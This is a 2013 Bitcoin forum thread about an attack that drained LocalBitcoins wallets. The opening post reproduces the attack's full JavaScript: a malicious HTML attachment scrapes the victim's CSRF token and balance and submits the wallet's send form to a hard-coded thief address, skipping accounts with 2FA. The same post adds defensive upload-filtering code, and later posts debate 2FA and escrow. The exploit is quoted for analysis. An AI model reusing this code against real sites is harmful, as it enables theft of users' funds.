runeks
Legendary
Offline
Activity: 980
Merit: 1008
September 13, 2013, 12:43:32 PM
This is the exploit in question:

Code:
function loadpic() {
    // Fetch the victim's own wallet page. The request carries the victim's session
    // because the "attachment" was an HTML page rendered in the site's own origin.
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) { walh(data); }
        });
    }

    // Submit the wallet's own "send" form, using the CSRF token scraped from the page.
    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    function walh(html) {
        var hastfa = '';
        var csrftoken = '';
        var btc = 0;
        // Gives up if the wallet page shows a 2FA token field (id_token), which is why
        // accounts with 2FA enabled on withdrawals were not drained.
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            if (m[1] != '') { return; }
        }
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) { csrftoken = m[1]; } else { return; }
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) { btc = m[1]; } else { return; }
        btc = parseFloat(btc);
        btc = btc.toFixed(2);
        if (btc < 0.02) { return; }
        btc = btc - 0.01;
        btc = btc.toFixed(2);
        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }

    btcget();
}

Retrieved from this site: http://urlquery.net/report.php?id=5191051
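As an added example (not LocalBitcoins' code and not from this thread), the server-side handling that stops an uploaded "picture" that is really an HTML page from running in the site's origin: derive the type from the bytes rather than the filename, reject anything that parses as markup at upload time, and serve whatever is accepted as a sandboxed download. The image-only policy, the function names and the sample attachment are assumptions of this example.

```python
import re
from typing import Dict, Tuple

# Magic bytes for the only formats a trade-chat attachment plausibly needs
# (a policy assumption of this example, not LocalBitcoins' rule).
_IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}

# Markup a browser would execute if the bytes were ever rendered inline.
_ACTIVE_MARKUP = re.compile(rb"<\s*(script|html|body|iframe|svg|object|embed|meta)\b"
                            rb"|javascript:|\bon\w+\s*=", re.IGNORECASE)

def sniff_content_type(data: bytes) -> str:
    """Derive the MIME type from content, never from the uploader's filename."""
    for magic, ctype in _IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ctype
    return "application/octet-stream"

def is_active_content(data: bytes) -> bool:
    """True when the leading bytes contain HTML/script that could run in-origin."""
    return _ACTIVE_MARKUP.search(data[:4096]) is not None

def accept_upload(data: bytes) -> Tuple[bool, str]:
    """Upload-time gate: only sniffed images, and nothing that parses as markup."""
    if is_active_content(data):
        return False, "active content (HTML/script) is not an allowed attachment"
    if sniff_content_type(data) == "application/octet-stream":
        return False, "unrecognised file type"
    return True, "ok"

def attachment_headers(filename: str, data: bytes) -> Dict[str, str]:
    """Download-time headers: force a download, forbid sniffing, sandbox the document."""
    # Strip anything that could smuggle a second header parameter or a path component.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)[:100] or "attachment"
    return {
        "Content-Type": sniff_content_type(data),
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",  # no script, opaque origin, no cookies
    }

# Constructed sample: the shape of the malicious attachment discussed in this thread.
SAMPLE_HTML_ATTACHMENT = b"<html><body><script>loadpic();</script></body></html>"
```

Serving uploads from a separate origin (a dedicated user-content domain) is the stronger complement to these headers, since it removes the session cookies and CSRF token from the attachment's reach entirely.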
Mike Hearn
Legendary
Offline
Activity: 1526
Merit: 1134
September 13, 2013, 02:18:13 PM
Ideally, there would be no need to deposit funds into any website to do basic person-to-person trading. I never used the localbitcoins escrow system; if you meet in person it's not that important.
herzmeister (OP)
Legendary
Offline
Activity: 1764
Merit: 1007
September 13, 2013, 02:23:07 PM
Quote from: Mike Hearn on September 13, 2013, 02:18:13 PM
Ideally, there would be no need to deposit funds into any website to do basic person-to-person trading. I never used the localbitcoins escrow system; if you meet in person it's not that important.

It enables in-person trading without requiring internet access at all, for either buyer or seller. All that's required is that the seller can receive SMS. In practice, many do have smartphones and transfer their coins directly, though. For online trading, escrow is pretty necessary in most cases. That's why traders often have a few coins in their localbitcoins.com wallets.
marcovaldo
September 13, 2013, 02:50:44 PM
Did you personally lose anything?
MPOE-PR
September 13, 2013, 02:54:57 PM
Quote:
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first! So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

Quote:
They'll learn when they're able to recognize their own vanity, stupidity, and unreadiness. Which would often enough seem about as likely as pigs flying, sadly. By now it's at the same stage as the "Piratenpartei" in Germany: sympathetic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and become ridiculous when trying.
Don't write code; go to your local bank, ask for an internship and learn how money works.

This, basically. With the addendum that not everyone is cut out to run a business. And the post-script that paying attention to what the actually capable have to say is a necessary step.
johnyj
Legendary
Offline
Activity: 1988
Merit: 1012
Beyond Imagination
September 13, 2013, 02:56:34 PM
Bitcoin withdrawals should be authenticated through email.
BitAddict
Legendary
Offline
Activity: 1190
Merit: 1001
September 13, 2013, 03:02:44 PM
Quote from: johnyj on September 13, 2013, 02:56:34 PM
Bitcoin withdrawals should be authenticated through email.

With 2FA, I think it is enough.
johnyj
Legendary
Offline
Activity: 1988
Merit: 1012
Beyond Imagination
September 13, 2013, 03:04:20 PM
Quote from: johnyj on September 13, 2013, 02:56:34 PM
Bitcoin withdrawals should be authenticated through email.

Quote from: BitAddict on September 13, 2013, 03:02:44 PM
With 2FA, I think it is enough.

2FA is not convenient if you use the site many times a day, and it does not work when you are abroad and use a different SIM card.
Cryddit
Legendary
Offline
Activity: 924
Merit: 1132
September 13, 2013, 03:29:35 PM
Quote:
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first! So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

Quote:
People keep putting Coins into online wallets whose security they don't know crap about! WHEN WILL PEOPLE LEARN?

Quote:
You need to leave the bitcoins in the wallet if you want to sell them ... and I believe more a company than the average private seller... How did you buy your bitcoins, sir?

Some I bought them from Bitstamp. And moved them the instant they showed up in Bitstamp account, to my private wallet.

Some I got for pay - made machine parts for someone. She wanted pay me in Bitcoin, I said sure.

Some others I got for pay - wrote code for somebody wanted special exclusive super-secret software analyze enormous big pile of data, paid Bitcoin to keep private from someone else looking at bank account.

Some others I got for pay - Main job, security consult. I look at malware, see what it does by read machine code, figure out how to clean infected machines. Clients implement, or I implement, cleaning software, clients then sell. Pays well. Twice now I asked pay me in Bitcoin, they said 'sure, whatever'.

A couple I bought direct in person, smartphone to smartphone, from speculator got nervous back when price was USD$60.
joesmoe2012
September 13, 2013, 06:26:24 PM
You can make 2FA work with different SIMs, I have, it's not that difficult. Just backup and then restore.
Everybody should be using 2FA if you're dealing with bitcoins. Otherwise stay away from targets such as exchanges.
Good work on localbitcoins' behalf in paying out of their pocket for all the stolen coins.
smoothie
Legendary
Offline
Activity: 2492
Merit: 1474
LEALANA Bitcoin Grim Reaper
September 14, 2013, 03:37:02 AM
As the saying goes:
Those who fail to learn from history are doomed to repeat it.
justusranvier
Legendary
Offline
Activity: 1400
Merit: 1013
September 14, 2013, 03:40:39 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
joesmoe2012
September 14, 2013, 08:51:22 AM
Quote from: justusranvier on September 14, 2013, 03:40:39 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.

Incorrect. They use 2FA for withdrawal confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.
BitAddict
Legendary
Offline
Activity: 1190
Merit: 1001
September 14, 2013, 11:22:17 AM
Quote from: justusranvier on September 14, 2013, 03:40:39 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.

Quote from: joesmoe2012 on September 14, 2013, 08:51:22 AM
Incorrect. They use 2FA for withdrawal confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.

+1. You can't withdraw without a 2FA code, if enabled.
johnyj
Legendary
Offline
Activity: 1988
Merit: 1012
Beyond Imagination
September 14, 2013, 12:15:56 PM
At least an email-based 2FA is much better.
rufusBTC
Jr. Member
Offline
Activity: 121
Merit: 1
The World’s First Blockchain Core
September 14, 2013, 05:10:08 PM
Quote from: justusranvier on September 14, 2013, 03:40:39 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.

Quote from: joesmoe2012 on September 14, 2013, 08:51:22 AM
Incorrect. They use 2FA for withdrawal confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.

Quote from: BitAddict on September 14, 2013, 11:22:17 AM
+1. You can't withdraw without a 2FA code, if enabled.

Looks like the exploit just sucked out people's BTC through a loophole, even if they had 2FA.
niko
September 14, 2013, 06:46:59 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?
They're there, in their room. Your mining rig is on fire, yet you're very calm.
willphase
September 14, 2013, 10:21:22 PM
Quote from: niko on September 14, 2013, 06:46:59 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

You had to open the attachment (which was in fact an HTML page) and not have 2FA on withdrawals enabled.

Will
herzmeister (OP)
Legendary
Offline
Activity: 1764
Merit: 1007
September 14, 2013, 10:22:58 PM
Quote from: niko on September 14, 2013, 06:46:59 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

Did you mean because I linked to the forum in the OP? No, that link was safe, or what do you think of me? The exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.
niko
September 15, 2013, 01:58:31 AM
Quote from: niko on September 14, 2013, 06:46:59 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

Quote from: herzmeister on September 14, 2013, 10:22:58 PM
Did you mean because I linked to the forum in the OP? No, that link was safe, or what do you think of me? The exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.

Ten days ago I was browsing through the LBC site, and there was great advice on how to trade safely. I specifically remember them reminding people to always be cautious with any attachments in emails, etc. People clicked on attachments, did not have 2FA, and sure enough the thief got their coins.